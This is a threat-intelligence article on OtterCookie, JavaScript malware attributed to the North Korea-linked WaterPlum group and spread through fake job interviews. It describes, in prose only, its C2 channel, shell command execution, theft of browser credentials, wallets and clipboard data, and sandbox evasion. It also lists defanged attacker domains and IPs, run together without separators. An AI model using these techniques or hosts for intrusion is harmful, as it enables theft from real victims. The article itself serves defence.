In the ever-evolving landscape of cyber threats, state-sponsored actors continually refine their tactics to exploit vulnerabilities and achieve their objectives. One such actor, the North Korea-linked group known as WaterPlum also referred to as Famous Chollima or PurpleBravo has been observed deploying a new malware strain named OtterCookie. This malware is part of the broader “Contagious Interview” campaign, which targets financial institutions, cryptocurrency operators, and FinTech companies worldwide. Since its emergence in September 2024, OtterCookie has undergone several iterations, each introducing new features and capabilities that enhance its effectiveness and stealth.
This article delves into the additional features of OtterCookie malware used by WaterPlum, examining its evolution, functionalities, and the implications for cybersecurity professionals.
The Contagious Interview Campaign and OtterCookie’s Emergence
The Contagious Interview campaign is characterized by its use of social engineering tactics, particularly impersonating recruiters to lure victims into downloading malicious software under the guise of job opportunities. These deceptive practices have been instrumental in distributing malware strains such as BeaverTail and InvisibleFerret. In September 2024, cybersecurity researchers identified a new addition to this arsenal: OtterCookie. This JavaScript-based malware is typically delivered through compromised Node.js projects, npm packages, or applications developed using Qt or Electron frameworks. Once executed, OtterCookie establishes communication with a command-and-control (C2) server using the Socket.IO library, allowing attackers to issue commands and exfiltrate data.
Evolution of OtterCookie: Versions and Features
Since its initial detection, OtterCookie has evolved through multiple versions, each introducing new functionalities:
OtterCookie v1
- File Grabber Functionality: The initial version focused on collecting files from the infected system.
OtterCookie v2
- Shell Command Execution: Introduced the ability to execute shell commands received from the C2 server, allowing for more dynamic interactions with the infected system.
OtterCookie v3 (Observed in February 2025)
- Modular Architecture: Split into main and upload modules.
- Windows Environment Support: Enhanced compatibility with Windows systems.
- Hardcoded File Collection: Targeted document files, images, and cryptocurrency-related files without relying on remote commands.
OtterCookie v4 (Observed in April 2025)
- Stealer Modules: Introduced modules to extract credentials from browsers like Google Chrome and Brave, as well as MetaMask wallets.
- Virtual Environment Detection: Implemented checks to identify sandboxed or virtualized environments, aiding in evasion.
- Clipboard Data Theft: Utilized standard OS commands to capture clipboard contents, moving away from third-party libraries.
The progression from v1 to v4 demonstrates a concerted effort by WaterPlum to enhance OtterCookie’s capabilities, making it a more potent tool for data exfiltration and system compromise.
Technical Analysis of OtterCookie’s Capabilities
Communication and Command Execution
OtterCookie leverages the Socket.IO library to establish real-time, bidirectional communication with its C2 server. This connection facilitates the execution of various commands, including:
- Shell Commands: Executing system commands to gather information or manipulate the system.
- File Exfiltration: Transferring targeted files to the attacker’s server.
- Clipboard Monitoring: Capturing clipboard data, which may contain sensitive information.
The use of Socket.IO allows OtterCookie to maintain a persistent and responsive connection with its operators, enabling real-time control over the infected system.
Credential and Data Theft
OtterCookie’s stealer modules are designed to extract sensitive information from various sources:
- Browser Credentials: Decrypting and extracting login data from browsers like Google Chrome using the Data Protection API (DPAPI).
- Cryptocurrency Wallets: Targeting files associated with MetaMask and other wallet extensions to access cryptocurrency assets.
- MacOS Keychain: Accessing stored credentials on MacOS systems.
The malware’s ability to harvest such data poses significant risks to individuals and organizations, particularly those involved in financial services and cryptocurrency operations.
Evasion Techniques
To avoid detection and analysis, OtterCookie incorporates several evasion strategies:
- Virtual Environment Detection: Identifying sandboxed or virtualized environments to prevent execution in analysis settings.
- Standard Command Utilization: Employing native OS commands for operations like clipboard access, reducing reliance on detectable third-party libraries.
- Modular Design: Separating functionalities into distinct modules, allowing for selective deployment and reducing the malware’s footprint.
These techniques enhance OtterCookie’s stealth and persistence within compromised systems.
Indicators of Compromise (IoCs)
Security professionals should be aware of the following IoCs associated with OtterCookie:
- Domains:
alchemy-api-v3[.]cloudchainlink-api-v3[.]cloudmoralis-api-v3[.]cloudmodilus[.]io
- IP Addresses:
116[.]202.208.12565[.]108.122.31194[.]164.234.151135[.]181.123.177188[.]116.26.8465[.]21.23.6395[.]216.227.188
Monitoring network traffic for connections to these domains and IP addresses can aid in the early detection of OtterCookie infections.
Recommendations to Mitigate OtterCookie Threats
To protect against OtterCookie and similar threats, cybersecurity professionals should consider the following measures:
- Employee Training: Educate staff on recognizing phishing attempts and the dangers of unsolicited job offers.
- Software Verification: Ensure that all software and packages are obtained from trusted sources and verified before installation.
- Endpoint Protection: Deploy advanced endpoint detection and response (EDR) solutions capable of identifying and mitigating sophisticated malware.
- Network Segmentation: Implement network segmentation to limit the spread of malware within the organization.
- Regular Updates: Keep all systems and software up to date with the latest security patches.
- Access Controls: Apply the principle of least privilege to restrict user access to only necessary resources.
- Monitoring and Logging: Continuously monitor systems and maintain logs to detect unusual activities promptly.
- Incident Response Plan: Develop and regularly update an incident response plan to address potential breaches effectively.
- Threat Intelligence Sharing: Participate in information-sharing communities to stay informed about emerging threats.
- Regular Audits: Conduct periodic security audits to identify and remediate vulnerabilities.
Conclusion
The emergence and evolution of OtterCookie malware underscore the persistent and adaptive nature of state-sponsored cyber threats. By continuously enhancing their tools and tactics, groups like WaterPlum pose significant risks to organizations worldwide, particularly those in the financial and cryptocurrency sectors. Cybersecurity professionals must remain vigilant, adopting comprehensive and proactive strategies to detect, prevent, and respond to such threats effectively. Staying informed about the latest developments in malware capabilities and attack vectors is crucial in safeguarding organizational assets and maintaining the integrity of digital infrastructures.
